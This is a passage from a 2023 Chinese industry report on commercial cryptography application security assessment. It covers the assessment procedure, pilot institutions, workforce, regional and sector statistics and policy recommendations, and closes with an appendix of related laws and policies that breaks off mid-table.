自行或组织商用密码相关产业单位, 根据网络安全等级保护定级情况和密码应用需求,依据 GB/T 39786-2021等相关标准要求制定商用密码应用 方案,规划商用密码保障系统。方案编制完成后,自行或者委托商用密码检测机构开展密码应用方案商用密 码应用安全性评估。密码应用方案未通过密评的,不得作为商用密码保障系统的建设依据。 在系统的建设阶段, 网络运营者自行或组织相关商用密码产业单位、系统开发商等支撑单位, 按照通过 商用密码应用安全性评估的商用密码应用方案进行实施,落实商用密码安全防护措施,建设商用密码保障系 统。系统运行前,网络运营者应当自行或者委托商用密码检测机构开展商用密码应用安全性评估。系统未通 过商用密码应用安全性评估的,针对评估中发现的安全问题及时整改,整改完成后可请密评机构进行复评, 改造期间不得投入运行。仍未通过的,不得通过项目验收。 在系统建成运行后, 网络运营者应当按照法律法规等相关要求, 自行或者委托商用密码检测机构每年至 少开展一次商用密码应用安全性评估,确保商用密码保障系统正确有效运行。系统发生密码相关重大安全事 中国密码学会密评联委会 网络运营者 密评机构 密码管理部门 委托评估 未通过 修改完成 形式审查合格 出具回执 密码应用方案修改 通过评估的密码应用方 案和评估报告 项 目立项材料 委托评估 未通过 整改完成 出具回执 依据密码应用方案进行 建设 系统整改 系统测评报告 项目验收材料 系统整改 委托评估 未通过 发生重大安全事故 通过 应急评估 系统测评报告 图 2 密评程序 商用密码应 2023 件、重大调整或特殊紧急情况时, 网络运营者应当及时联系商用密码检测机构开展商用密码应用安全性评估, 并依据评估结果进行应急处置,采取必要的安全防范措施。未通过商用密码应用安全性评估的,网络运营者 应当进行改造。若系统约束条件发生重要变化,必要时,项目使用单位需重新修订和编制密码应用方案,对 系统进行升级改造并在改造期间采取必要措施保证网络与信息系统运行安全。 完成规划、建设、运行和应急评估的每一个阶段时, 网络运营者应当在商用密码应用安全性评估报告出 具 30 日内,填写《网络与信息系统密评备案信息表》等密评工作情况相关材料,按照国家密码管理部门有 关规定,连同评估报告一起报送国家密码管理局或者网络与信息系统所在地省、自治区、直辖市密码管理部 门备案。国家密码管理局或者省、自治区、直辖市密码管理部门应当对备案材料进行形式审查,审查不通过 的,应当责令网络运营者重新提供商用密码应用安全性评估报告。相关商用密码检测机构应当配合网络运营 者重新开展商用密码应用安全性评估或者重新出具商用密码应用安全性评估报告,不得重复收取费用。 3 密评行业发展情况 3.1 密评试点机构规模布局日趋合理 2021 年国家密码管理局公告(第 42 号)发布的密评试点机构共 48 家, 可在全国范围内开展密评工作。 48 家密评试点机构覆盖全国 18 个省(自治区、直辖市),其中行业主管部门推荐机构 20 家,地方密码管 理部门推荐机构 28 家,如图 3 所示。地方密码管理部门推荐的 28 家机构中, 北京市、浙江省、广东省各 3 家, 上海市、山东省、四川省、新疆维吾尔自治区各 2 家, 天津市、河北省、辽宁省、吉林省、江苏省、安徽省、 福建省、江西省、河南省、湖南省、重庆市各 1 家。 中国密码学会密评联委会 商用密码应 2023 3.2 密评人才供给能力持续提升 近年来, 密码专业人才培养质量和数量“双提升”。国家密码管理局持续加大密评从业人员考核力度, 先后于 2017 年 11 月、 2020 年 1 月、 2022 年 7 月、 2023 年 7 月组织 4 次密评人员考核,通过密评人员考核 人数稳步增加,为密评工作开展提供了重要的人才保障。2021 年 3 月, “密码科学与技术”列入《普通高 等学校本科专业目录(2021 年)》,高等职业教育专科专业增加“密码技术应用”专业。2022 年 9 月, 密 码专业正式纳入《研究生教育学科专业目录(2022 年)》。目前已有 15 所高校开设“密码科学与技术”本 科专业。2022 年 9 月,人力资源社会保障部颁布了 2022 版《中华人民共和国职业分类大典》,新增“密码 技术应用员”和“密码工程技术人员”两个职业。密码技术应用员定义为从事信息系统安全密码保障的架构 设计、系统集成、检测评估、运维管理、密码咨询等相关密码服务的人员。密码工程技术人员定义为从事密 码算法与协议实现、设备和系统研制、产品检测与认证、服务系统设计建设、标准编制、密码管理、专业技 术培训咨询的工程技术人员。《密码技术应用员国家职业技能标准》《密码工程技术人员国家职业标准》均 已公开发布,密码职业人才培养认定体系正加速构建,可有效满足密评人才需求。 3.3 密评覆盖范围逐年扩大 密评试点启动至今, 密评服务领域覆盖范围越来越广, 覆盖电子政务、金融、公安、能源、卫生健康等 重点领域。 2018-2022 年,年度开展系统评估的系统数量从 81 个增长到 4665 个,实现了大幅增长。 中国密码学会密评联委会 按照区域划分,2018-2022 年各区域开展密评数量的统计如表 5 及图 4 所示。各区域密评数量基本呈上 升趋势,华东地区密评数量在各区域中排名第一。 表 5 各区域开展密评数量统计表 地区 华北 东北 华东 华中 华南 西南 西北 2018 年数量 41 2 15 5 6 7 5 2019 年数量 115 68 97 114 72 56 40 2020 年数量 62 18 174 31 88 142 15 2021 年数量 237 133 512 118 195 443 192 2022 年数量 886 202 1173 402 791 726 485 总数 1341 423 1971 670 1152 1374 737 1200 1000 800 600 400 200 0 华南 2022年数量 图 4 各区域密评数量统计图 按照系统所属行业领域划分,2018-2022 年各行业开展密评数量的统计如23 数量基本呈上升趋势,政务行业密评数量在各行业中排名第一。 表 6 各行业密评数量统计表 行业 政务 金融 公安 能源 卫生健康 社会保障 自然资源 交通 其他 2018 年数量 19 15 7 5 3 5 2 7 18 2019 年数量 209 75 29 26 32 26 15 44 106 2020 年数量 172 24 92 74 36 19 14 52 47 2021 年数量 830 163 199 104 112 133 53 74 162 2022 年数量 2002 434 380 498 337 210 261 146 397 总数 3232 711 707 707 520 393 345 323 730 2000 1500 1000 500 0 政务 金融 2018年数量 公安 能源 卫生健康 社会保障 自然资源 交通 其他 2019年数量 2020年数量 2021年数量 2022年数量 图 5 各行业密评数量统计图 中国密码学会密评联委会 2018-2022 年各年度密评结论统计如图 6 所示,从密评结果来看,各年度密评通过率呈现逐年增长的趋势。 100.00% 90.00% 80.00% 70.00% 60.00% 50.00% 40.00% 30.00% 20.00% 10.00% 0.00% 92.59% 89.86% 80.94% 51.57% 48.43% 39.40% 7.41% . 2018 2019 2020 2021 2022 通过率 不通过率 图 6 各年度密评通过 / 不通过率统计图 按照机构划分, 2018-2022 年各年度机构开展密评数量(前十)的统计如图 7 所示。 机构10 2022年数量 图 7 各年度机构密评数量(前十)统计图 商用密码应 2023 发展建议 外部支撑体系建立健全,密评发展根基持续夯实。加快推进《商用密码管理条例》配套制度出台实施, 推动商用密码应用安全性评估要求与各地区各有关部门相关工作规划及政策制度同步部署、深度融合、配套 落地,统筹建立资金、人员、技术等方面要素保障机制与参考依据,形成制度化、常态化、便利化安排,实 现密评工作与网络化、数字化发展战略深度融合。加强密码宣传教育与密评引导培训,为密码应用单位在信 息系统规划、建设、运行、管理各环节提供密评政策支持和操作指导。 内在实施要素供给稳定充足,适应数字经济发展的密评事业有利局面逐步形成。系统完善密评相关国家 标准、行业标准、团体标准, 推出密评相关问题库、知识库与案例库, 以及面向大数据、物联网、人工智能、 云计算、车联网、区块链、隐私计算等新领域、新场景、新技术的技术指南与测评规范,不断增加场景化实 施要素,提升密评可操作性与落地性。强化密评管理平台、工具、手段创新,研究建设密码运行安全管理基 础设施,实现密评监管在线化、动态化、实时化,推动密评决策信息化、精准化、科学化,通过提升管理效 能为行业生态建设添砖加瓦。 依法管理有力实施,规范有序的密评市场活力充分激发。规范密评市场秩序, 落实密评结果备案等管理 制度,组织开展密评工作“飞行检查”,严厉查处密评违法违规行为。健全密评联委会组织体系,有效整合 密评机构参与力量,探索引入社会监督,围绕密评行业总体规划、标准供给、能力建设、行业自律等方面广 泛吸纳智慧方案。加强各地区各部门各机构密评实践定向指导、经验交流与督促考核,全力推动密评机构由 试点管理向行政许可衔接转换,建立密评机构常态化准入及退出机制,加快实现密评职业人才常态化教育培 训及社会化评价认定,丰富机构队伍及专业人才供给。 中国密码学会密评联委会 附录 1 :密评相关法规政策汇总 1.1 国家层面密码应用及密评相关法律法规 发文 / 起草单位 发布 / 施行时间 (注:已发布法 律法规为“施行 时间”,其他为 “发布时间”) 政策文件 相关内容 第十三届全 国人民代表 大会常务委 员会第十四 次会议通过 2020 年 1 月 1 日 《密码法》 (中华人民共 和国主席令第 三十五号) 第二十七条:法律、行政法规和国家有关规定要求使用商用密码进 行保护的关键信息基础设施, 其运营者应当使用商用密码进行保护, 自行或者委托商用密码检测机构开展商用密码应用安全性评估。商 用密码应用安全性评估应当与关键信息基础设施安全检测评估、网 络安全等级测评制度相衔接,避免重复评估、测评。 关键信息基础设施的运营者采购涉及商用密码的网络产品和服 务, 可能影响国家安全的, 应当按照《中华人民共和国网络安全法》 的规定,通过国家网信部门会同国家密码管理部门等有关部门组织 的国家安全审查。 第十二届全 国人民代表 大会常务 委员会第 二十四次会 议通过 2017 年 6 月 1 日 《网络安全法》 (中华人民共 和国主席令第 五十三号) 第十条:建设、运营网络或者通过网络提供服务,应当依照法律、 行政法规的规定和国家标准的强制性要求,采取技术措施和其他必 要措施,保障网络安全、稳定运行,有效应对网络安全事件,防范 网络违法犯罪活动,维护网络数据的完整性、保密性和可用性。 第二十一条:采取数据分类、重要数据备份和加密等措施。 第十三届全 国人民代表 大会常务 委员会第 二十九次会 议通过 2021 年 9 月 1 日 《数据安全法》 (中华人民共 和国主席令第 八十四号) 第二十七条:开展数据处理活动应当依照法律、法规的规定,建立 健全全流程数据安全管理制度,组织开展数据安全教育培训,采取 相应的技术措施和其他必要措施,保障数据安全。利用互联网等信 息网络开展数据处理活动, 应当在网络安全等级保护制度的基础上, 履行上述数据安全保护义务。 第十三届全 国人民代表 大会常务委 员会第三十 次会议通过 2021 年 11 月 1 日 《个人信息保 护法》(中华 人民共和国主 席令第九十一 号) 第五十一条:个人信息处理者应当根据个人信息的处理目的、处理 方式、个人信息的种类以及对个人权益的影响、可能存在的安全风 险等,采取下列措施确保个人信息处理活动符合法律、行政法规的 规定,并防止未经授权的访问以及个人信息泄露、篡改、丢失: …… (三)采取相应的加密、去标识化等安全技术措施。 商用密码应 2023 发文 / 起草单位 发布 / 施行时间 (注:已发布法 律法规为“施行 时间”,其他为 “发布时间”) 政策文件 相关内容 国务院第 4 次 常务会议修 订通过 2023 年 4 月 14 日 《商用密码管 理条例》 第三十八条:法律、行政法规和国家有关规定要求使用商用密码进 行保护的关键信息基础设施, 其运营者应当使用商用密码进行保护, 制定商用密码应用方案,配备必要的资金和专业人员,同步规划、 同步建设、同步运行商用密码保障系统,自行或者委托商用密码检 测机构开展商用密码应用安全性评估。 前款所列关键信息基础设施通过商用密码应用安全性评估方可 投入运行,运行后每年至少进行一次评估,评估情况按照国家有关 规定报送国家密码管理部门或者关键信息基础设施所在地省、自治 区、直辖市密码管理部门备案。 第四十一条:网络运营者应当按照国家网络安全等级保护制度要求, 使用商用密码保护网络安全。国家密码管理部门根据网络的安全保 护等级,确定商用密码的使用、管理和应用安全性评估要求,制定 网络安全等级保护密码标准规范。 第四十二条:商用密码应用安全性评估、关键信息基础设施安全检 测评估、网络安全等级测评应当加强衔接,避免重复评估、测评。 公安部会同 相关部门 2018 年 6 月 27 日 《网络安全等 级保护条例(征 求意见稿)》 第四十七条:非涉密网络应当按照国家密码管理法律法规和标准的 要求,使用密码技术、产品和服务。第三级以上网络应当采用密码 保护,并使用国家密码管理部门认可的密码技术、产品和服务。 第三级以上网络运营者应在网络规划、建设和运行阶段,按照 密码应用安全性评估管理办法和相关标准,委托密码应用安全性测 评机构开展密码应用安全性评估。网络通过评估后, 方可上线运行, 并在投入运行后,每年至少组织一次评估。密码应用安全性评估结 果应当报受理备案的公安机关和所在地设区市的密码管理部门备案。 国务院第 133 次常务会议 通过 2021 年 9 月 1 日 《关键信息基 础设施安全保 护条例》 第五十条:存储、处理涉及国家秘密信息的关键信息基础设施的安 全保护,还应当遵守保密法律、行政法规的规定。 关键信息基础设施中的密码使用和管理, 还应当遵守相关法律、 行政法规的规定。 国家网信办 会同相关部 门 2021 年 11 月 14 日 《网络数据安 全管理条例(征 求意见稿)》 第九条:数据处理者应当采取备份、加密、访问控制等必要措施, 保障数据免遭泄露、窃取、篡改、毁损、丢失、非法使用,应对数 据安全事件,防范针对和利用数据的违法犯罪活动,维护数据的完 整性、保密性、可用性。 数据处理者应当使用密码对重要数据和核心数据进行保护。 中国密码学会密评联委会 1.2 国家层面密码应用及密评相关政策文件 发文 / 起草单位 发文时间 政策文件 相关内容 国务院 2022 年 6 月 8 日 《国务院关于加强数字 政府建设的指导意见》 (国发〔2022〕14 号) 第三章“构建数字政府全方位安全保障体系”第二节“落实安 全制度要求”中提出:加强关键信息基础设施安全保护和网络 安全等级保护,建立健全网络安全、保密监测预警和密码应用 安全性评估的机制, 定期开展网络安全、保密和密码应用检查, 提升数字政府领域关键信息基础设施保护水平。 国务院办 公厅 2022 年 1 月 20 日 《国务院办公厅关于加 快推进电子证照扩大 应用领域和全国互通互 认的意见》(国办发〔 2022〕3 号) 第四章“全面提升电子证照应用支撑能力”第十四条“加强电 子证照应用安全管理和监管”中提出:加强电子证照签发、归集、 存储、使用等各环节安全管理,严格落实网络安全等级保护制 度等要求,强化密码应用安全性评估,探索运用区块链、新兴 密码技术、隐私计算等手段提升电子证照安全防护、追踪溯源 和精准授权等能力。 国务院 2021 年 12 月 12 日 《“十四五”数字经济 发展规划》(国发〔 2021〕29 号) 第九章“着力强化数字经济安全体系”第一节“增强网络安全 防护能力”中提出:提升网络安全应急处置能力,加强电信、 金融、能源、交通运输、水利等重要行业领域关键信息基础设 施网络安全防护能力,支持开展常态化安全风险评估,加强网 络安全等级保护和密码应用安全性评估。 国务院办 公厅 2019 年 12 月 30 日 《国家政务信息化项目 建设管理办法》(国办 发〔2019〕57 号) 第三章“建设和资金管理”第十五条、第十六条中提出:项目 建设单位应当落实国家密码管理有关法律法规和标准规范的要 求,同步规划、同步建设、同步运行密码保障系统并定期进行 评估。 项目软硬件产品的安全可靠情况,项目密码应用和安全审 查情况,以及硬件设备和新建数据中心能源利用效率情况是项 目验收的重要内容。 国务院 2019 年 4 月 26 日 《国务院关于在线政务 服务的若干规定》(国 务院令第 716 号) 第十三条提出:电子签名、电子印章、电子证照以及政务服务 数据安全涉及电子认证、密码应用的,按照法律、行政法规和 国家有关规定执行。 中共中央 办公厅、 国务院办 公厅 2018 年 7 月 15 日 密码应用与创新发展相 关工作规划 全面提升密码基础支撑能力,完善密码应用安全性评估审查机 制。 国务院办 公厅 2017 年 5 月 15 日 《政府网站发展指引》 (国办发〔2017〕47 号) 第七章“安全防护”第一小节“技术防护”中提出:对重要数据、 敏感数据进行分类管理,做好加密存储和传输。加强后台发布 终端的安全管理,定期开展安全检查,防止终端成为后台管理 系统的风险入口。使用符合国家密码管理政策和标准规范的密 码算法和产品,逐步建立基于密码的网络信任、安全支撑和运 行监管机制。 商用密码应用安全性评估 发展研究报告 1.3 各部门密码应用及密评相关政策文件 2023 发文 / 起草单位 发文时间 政策文件 相关内容 国家铁路局 2023 年 7 月 18 日 《铁路关键信 息基础设施安 全保护管理办 法(征求意见 稿)》 第十七条 法律、行政法规和国家有关规定要求使用商用密码进行保 护的铁路关键信息基础设施,运营者应当使用商用密码进行保护, 自行或者委托商用密码检测机构每年至少开展一次商用密码应用安 全性评估。 商用密码应用安全性评估应当与铁路关键信息基础设施安全检 测和风险评估、网络安全等级测评制度相衔接,避免重复评估、测评。 国家密码管理 局 2023 年 6 月 9 日 《商用密码检 测机构管理办 法(征求意见 稿)》 第三条 从事商用密码产品检测、网络与信息系统商用密码应用安全 性评估等商用密码检测活动,向社会出具具有证明作用的数据、结 果的机构,应当经国家密码管理局认定,依法取得商用密码检测机 构资质。 国家密码管理 局 2023 年 6 月 9 日 《商用密码应 用安全性评估 管理办法(征 求意见稿)》 第六条 法律、行政法规和国家有关规定要求使用商用密码进行保护 的网络与信息系统(以下简称重要网络与信息系统),其运营者应 当使用商用密码进行保护,制定商用密码应用方案,配备必要的资 金和专业人员, 同步规划、同步建设、同步运行商用密码保障系统, 并定期开展商用密码应用安全性评估。 交通运输部 2023 年 4 月 24 日 《公路水路关 键信息基础设 施安全保护管 理办法》 第十八条 法律、行政法规和国家有关规定要求使用商用密码进行保 护的公路水路关键信息基础设施,其运营者应当使用商用密码进行 保护,自行或者委托商用密码检测机构每年至少开展一次商用密码 应用安全性评估。 商用密码应用安全性评估应当与公路水路关键信息基础设施安 全检测评估、网络安全等级测评制度相衔接, 避免重复评估、测评。 国家密码管理 局 2022 年 12 月 1 日 《关于进一步 规范商用密码 应用安全性评 估试点工作的 通知》(国密 局字〔2022〕 454 号) 进一步加强对密评试点工作的督促指导,强调重要网络与系统运营 者密评主体责任,规范密评试点机构的日常监督,严格密评结果备 案材料的形式审查,包括对密评活动真实客观性、密评实施规范有 效性、密评记录清晰准确性、密评报告完整合规性等进行形式审查, 并明确了对密评机构、各级密码管理部门违规行为的惩罚措施。 国家能源局 2022 年 11 月 16 日 《关于印发 < 电力行业网络 安全管理办法 > 的通知》(国 能发安全规〔 2022〕100 号) 第三章“电力企业责任义务”第十五条中提出:电力企业应当按照 国家有关规定开展电力监控系统安全防护评估、网络安全等级保护 测评、关键信息基础设施网络安全检测和风险评估、商用密码应用 安全性评估和网络安全审查等工作,未达到要求的应当及时进行整 改。 国家卫生健康 委、国家中医 药局、国家疾 控局 2022 年 8 月 8 日 《医疗卫生机 构网络安全管 理办法》(国 卫规划发〔 2022〕29 号) 第二章“网络安全管理”第十五条中提出:各医疗卫生机构应按照《密 码法》等有关法律法规和密码应用相关标准规范,在网络建设过程 中同步规划、同步建设、同步运行密码保护措施,使用符合相关要 求的密码产品和服务。 中国密码学会密评联委会 发文 / 起草单位 发文时间 政策文件 相关内容 国家邮政局、 国家发展改革 委、交通运输 部 2021 年 12 月 28 日 《“十四五” 邮政业发展规 划》 第二章“主要任务”第六条“提高行业安全水平”中第十九点提出: 加强网络数据安全。严格落实网络安全工作责任制,完善行业网络 安全、数据安全有关标准规范。在网络建设和运营过程中,同步规 划、建设、使用有关安全保护措施, 严格落实国家关于等保、关保、 密评等有关要求。加强行业关键信息基础设施保护,组织编制相关 规划,强化行业指导和监督。加强行业重要数据和个人信息保护。 民政部 2021 年 12 月 23 日 《关于印发 < “十四五” 民政信息化发 展规划 > 的通 知》(民发〔 2021〕104 号) 第三章“重点任务”第四条中提出:全面开展国产商用密码应用, 构建民政统一的密码应用基础服务平台,提供统一的数据传输、存 储加密和身份认证管理等相关服务,提升密码使用和管理水平。 国家密码管理 局 2021 年 11 月 26 日 《关于规范商 用密码应用 安全性评估结 果备案工作的 通知》(国密 局字〔2021〕 392 号) 网络与信息系统运营者同步规划、同步建设、同步运行商用密码保 障系统,规范开展密评工作,履行备案程序。密码管理机构对密评 机构的备案材料进行形式审查,定期收集汇总备案信息,按季度报 送国家密码管理局。密评机构按年度统计密评工作情况报送国家密 码管理局。 国家密码管理 局、中央网信 办、国家发展 改革委、科技 部、工业和信 息化部、公安 部、财政部、 国务院国资 委、市场监管 总局、证监会 2021 年 11 月 20 日 促进商用密码 产业高质量发 展相关文件 依法督促建设密码保障体系,并强化重要网络与信息系统商用密码 应用安全性评估的执法检查。 工业和信息化 部 2021 年 9 月 15 日 《关于加强车 联网网络安全 和数据安全工 作的通知》(工 信部网安〔 2021〕134 号) 第四章“加强车联网服务平台安全防护”第十条中提出:认定为关 键信息基础设施的,要落实《关键信息基础设施安全保护条例》有 关规定,并按照国家有关标准使用商用密码进行保护,自行或者委 托商用密码检测机构开展商用密码应用安全性评估。 工业和信息化 部、中央网信 办、科技部、 生态环境部、 住房城乡建设 部、农业农村 部、国家卫生 健康委、国家 能源局 2021 年 9 月 10 日 《物联网新型 基础设施建设 三年行动计划 (2021-2023 年)》(工 信部联科〔 2021〕130 号) 第二章“重点任务”第四条“支撑体系优化行动”中第十二点提出: 加快物联网领域商用密码技术和产品的应用推广,建设面向物联网 领域的密码应用检测平台,提升物联网领域商用密码安全性和应用 水平。 商用密码应 2023 发文 / 起草单位 发文时间 政策文件 相关内容 工业和信息化 部、中央网信 办、国家发展 改革委、教育 部、财政部、 住房和城乡建 设部、文化和 旅游部、国家 卫生健康委、 国务院国资 委、国家能源 局 2021 年 7 月 5 日 《5G 应用“扬 帆”行动计划 (2021-2023 年)》(工信 部联通信〔 2021〕77 号) 第四章“提升 5G 应用支撑能力”第三条“5G 应用安全提升行动” 中第三十点提出:在 5G 应用中推广使用商用密码,做好密码应用 安全性评估。 交通运输部办 公厅 2021 年 5 月 27 日 《关于印发 < 城市轨道交通 自动售检票系 统运营技术规 范(试行) > 的通知》(交 办运〔2022〕 27 号) 第九章“互联网票务”第 9.3 条“运营安全”中第 9.3.3 点提出:互 联网票务的密钥使用和管理应符合国家网络安全及商用密码管理的 相关法律法规,并保证支付安全。 住房城乡建设 部、中央网信 办、教育部、 科技部、工业 和信息化部、 公安部、民政 部、人力资源 社会保障部、 交通运输部、 商务部、文化 和旅游部、国 家卫生健康 委、应急部、 市场监管总 局、广电总局、 体育总局 2021 年 4 月 6 日 《关于加快发 展数字家庭提 高居住品质的 指导意见》(建 标〔2021〕28 号) 第四章“完善数字家庭系统”第四条中提出:强化网络和数字安全 保障。数字家庭系统应同步规划、同步建设、同步使用网络安全技 术。按照法律法规规定和国家强制性标准要求,采取技术等必要措 施, 保障数字家庭系统安全稳定运行, 防止信息泄露、损毁、丢失, 确保收集、产生数据和个人信息安全。遵守密码应用规定,形成安 全可控完整的产业生态系统。 国家卫生健康 委办公厅、国 家中医药局办 公室 2020 年 9 月 27 日 《关于加强全 民健康信息标 准化体系建设 的意见》(国 卫办规划发〔 2020〕14 号) 第二章“全民健康信息标准化体系建设的重点任务”第四条“加强 网络安全标准化建设”中第一点提出:完善行业网络安全标准体系。 贯彻《中华人民共和国网络安全法》,推进网络安全等级保护、商 用密码应用、关键信息基础设施保护等制度在行业落地实施,研究 编制卫生健康行业网络安全技术、医疗卫生机构安全能力评估、关 键信息基础设施识别认定和保护等标准。 中国密码学会密评联委会 发文 / 起草单位 发文时间 政策文件 相关内容 公安部 2020 年 7 月 22 日 《贯彻落实网 络安全等级 保护制度和关 键信息基础设 施安全保护制 度的指导意 见》(公网安 〔2020〕1960 号) 第二章“深入贯彻实施国家网络安全等级保护制度”第六条中提出: 落实密码安全防护要求。网络运营者应贯彻落实《密码法》等有关 法律法规规定和密码应用相关标准规范。第三级以上网络应正确、 有效采用密码技术进行保护,并使用符合相关要求的密码产品和服 务。第三级以上网络运营者应在网络规划、建设和运行阶段,按照 密码应用安全性评估管理办法和相关标准,在网络安全等级测评中 同步开展密码应用安全性评估。 国家发展改革 委办公厅 2020 年 7 月 9 日 《关于加快落 实新型城镇 化建设补短板 强弱项工作有 序推进县城智 慧化改造的通 知》(发改办 高技〔2020〕 530 号) 第三章“重点方向”第四条中提出:建全网络安全防护体系,做好 网络安全与智慧化改造一体化推进。落实网络安全工作责任制要求, 完善智慧化改造网络安全管理制度规范。认真落实国家网络安全等 级保护、网络安全审查、云计算采购服务、国家密码管理等有关规定, 采购部署安全可靠的软硬件产品,具备与智慧化水平相匹配的体系 化安全防护能力。 教育部办公厅 2020 年 2 月 26 日 《2020 年教 育信息化和网 络安全工作要 点》(教科技 厅〔2020〕1 号) 第三章“重点任务”第五条“全面推进教育治理能力优化行动”中 第十五点提出:加强教育系统密码应用与管理。落实《教育行业密 码与应用创新发展实施方案》, 推进密码基础设施和支撑体系建设, 有序推动教育重要业务信息系统开展密码应用安全性评估,完善教 育数字认证(CA)基础支撑体系建设, 推动国家教育管理信息系统 密码普遍应用,提升系统安全和数据安全。 水利部办公厅 2020 年 2 月 14 日 《2020 年水 利网信工作要 点》(办信息 〔2020〕22 号) 第一章“补水利网信短板”第一条“补水利网络安全短板”中第二 点提出:推进商用密码应用。组织宣贯《中华人民共和国密码法》, 开展水利行业密码应用专题调研, 出台推进商用密码应用具体措施。 落实《水利部密码应用与创新发展实施方案(2018-2022 年)》, 持续推进三峡水利枢纽、南水北调工程等重要水利基础设施和国家 水资源管理系统等重要信息系统的密码应用。 交通运输部 2019 年 12 月 9 日 《关于印发 < 推进综合交通 运输大数据 发展行动纲要 (2020-2025 年)> 的通知》 (交科技发〔 2019〕161 号) 第三章“主要任务”第四条“加强大数据安全保障”中第十八点提 出:完善数据安全保障措施。推进交通运输领域数据分类分级管理, 加强重要数据和个人信息安全保护,制定数据分级安全管理、数据 脱敏等制度规范。推进重要信息系统密码技术应用和重要软硬件设 备自主可控。 国家能源局 2018 年 9 月 13 日 《国家能源局 关于加强电力 行业网络安全 工作的指导意 见》(国能发 安全〔2018〕 72 号) 第五章“加强行业网络安全基础设施建设”第十四条中提出:加快 密码基础设施建设。在重要业务、重要领域实施密码保护,完善电 力行业密码支撑体系,实现电力行业密码基础设施一体化管理。健 全电力行业密码检测手段,开展密码应用安全性评估。深化商用密 码在电力行业中的应用,促进密码技术与电力应用融合发展。 商用密码应 2023 发文 / 起草单位 发文时间 政策文件 相关内容 交通运输部办 公厅 2018 年 1 月 31 日 《交通一卡通 运营服务质量 管理办法(试 行)》(交办 运〔2018〕17 号) 第八章“安全管理”第六十一条中提出:交通一卡通运营机构应当 按照国家关于网络安全及商用密码管理的法律和行政法规相关规 定,使用交通一卡通商用密码,推动国产商用密码应用,落实业务 数据和信息的安全保护责任,保障交通一卡通信息安全。 财政部 2017 年 12 月 26 日 《政务信息系 统政府采购 管理暂行办 法》(财库〔 2017〕210 号) 第八条提出:采购需求应当落实国家密码管理有关法律法规、政策 和标准规范的要求,同步规划、同步建设、同步运行密码保障系统 并定期进行评估。 第十二条提出:采购人应当按照国家有关规定组织政务信息系统项 目验收,根据项目特点制定完整的项目验收方案。验收方案应当包 括项目所有功能的实现情况、密码应用和安全审查情况、信息系统 共享情况、维保服务等采购文件和采购合同规定的内容,必要时可 以邀请行业专家、第三方机构或相关主管部门参与验收。 1.4 各省(自治区、直辖市)及新疆生产建设兵团密码应用及密评 相关政策文件 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 北京市 2021 年 5 月 《政府投资信息化项目 密码应用工作规范》 新建网络和信息系统应当采用国产密码进行保护,同步规 划、同步建设、同步运行密码保障系统,定期开展密码应 用安全性评估,已建网络和信息系统应当进行密码国产化 改造,确保使用的密码算法和技术符合国家的法律法规和 相关标准,使用的密码产品和服务通过国家密码管理部门 的核准或许可。 2019 年 4 月 《关于在政府投资信息 化项目建设中规范使用 密码的通知》 项目实施单位要同步规划、同步建设、同步运行密码保障 系统,定期开展密码应用安全性评估, 确保不新增安全风险。 天津市 2021 年 12 月 《天津市政务信息化项 目建设管理办法》 市级政务信息化项目建设应当符合国家和天津市网络安全、 数据安全、密码使用相关要求;项目建设部门应当落实国 家密码管理有关法律法规和标准规范的要求,同步规划、 同步建设、同步运行密码保障系统并定期进行密码应用安 全性评估。 2020 年 7 月 《关于切实做好政务信 息化项目密码应用工作 的通知》 政务信息化项目建设单位,在申请项目资金前应当按通知 要求向密码管理部门提交材料, 进行密码使用合规性审核; 在完成项目建设任务后,进行密评;在项目验收运行后, 定期开展密评。 中国密码学会密评联委会 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 河北省 2020 年 11 月 《关于进一步加强非涉 密政务信息系统密码应 用与安全性评估工作的 通知》(冀国密局字〔 2020〕12 号) 落实《河北省省级政务信息化项目建设管理办法》(冀政 办字〔2020〕48 号)要求,规范省内非涉密政务信息系统 立项、实施、验收阶段密码保障系统建设、管理, 落实“三 同步一评估”要求。 2020 年 4 月 《河北省省级政务信息 化项目建设管理办法》 (冀政办字〔2020〕48 号) 第十九条提出:项目建设单位应当落实国家密码管理有关 法律、法规和标准规范的要求,同步规划、同步建设、同 步运行密码保障系统并定期进行评估。 第三十七条提出:省各部门应当严格遵守有关保密等法律、 法规规定,构建全方位、多层次、 一致性的防护体系,按 要求采用密码技术,并定期开展密码应用安全性评估,确 保政务信息系统运行安全和政务信息资源共享交换的数据 安全。 2019 年 3 月 《关于开展重要信息系 统密码应用安全性评估 的通知》(冀国密局字 〔2019〕2 号) 贯彻落实中央文件精神,组织省内有关单位对其建设使用 的重要信息系统开展密评,省密码管理部门对工作情况和 评估发现问题开展监督检查。 山西省 2022 年 10 月 《山西省财政厅关于在 政府采购中落实密码应 用的通知》(晋财〔 2022〕13 号) 各预算单位要严格按照《密码法》及相关要求推进密码应用, 涉及金融及重要领域的信息化项目要同步规划、同步建设、 同步运行密码保障系统,保障网络和信息安全。 2021 年 8 月 《山西省政务云管理 办法》(晋政办发〔 2021〕72 号) 第五章“安全管理”第二十四条中提出:政务云服务提供 方和政务云使用部门要严格落实密码应用法律法规和相关 政策,使用符合国家技术标准规范的软硬件产品及密码, 优先使用自主可控的软硬件产品,定期开展密码应用安全 性评估。 2019 年 9 月 《山西省政务信息化项 目建设应用管理办法》 (晋政办发〔2019〕72 号) 第五章“管理和安全”第三十七条中提出:项目实施单位 与项目建设单位共同开展网络与信息安全风险评估,严格 落实等级保护和国家密码管理要求, 同步规划、同步建设、 同步运行密码保障系统并定期评估,切实保障政务信息系 统安全稳定运行。 内蒙古 自治区 2023 年 1 月 《内蒙古自治区 “十四五”期间商用密 码重点工作任务》(内 国密局发〔2023〕1 号) 加强商用密码应用安全性评估和管理。推动关键信息基础 设施、等级保护三级及以上信息系统、全区政务信息系统 等同步规划、同步建设、同步运行密码保障系统,定期开 展商用密码应用安全性评估;加强与政务信息化项目审批 部门的工作协同,严格落实商用密码应用闭环管理要求; 加强对密评机构的指导和管理,探索建立用户评价机制, 持续提升密评机构能力水平;根据国家总体部署,按照科 学布局、强优兼顾、考核认定的原则,适时培育商用密码 应用安全性测评机构;持续优化“内蒙古自治区商用密码 业务监管平台“功能,推进商用密码应用动态监测,加强 商用密码应用信息归集管理,适时与国家平台对接。 商用密码应 2023 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 内蒙古 自治区 2022 年 12 月 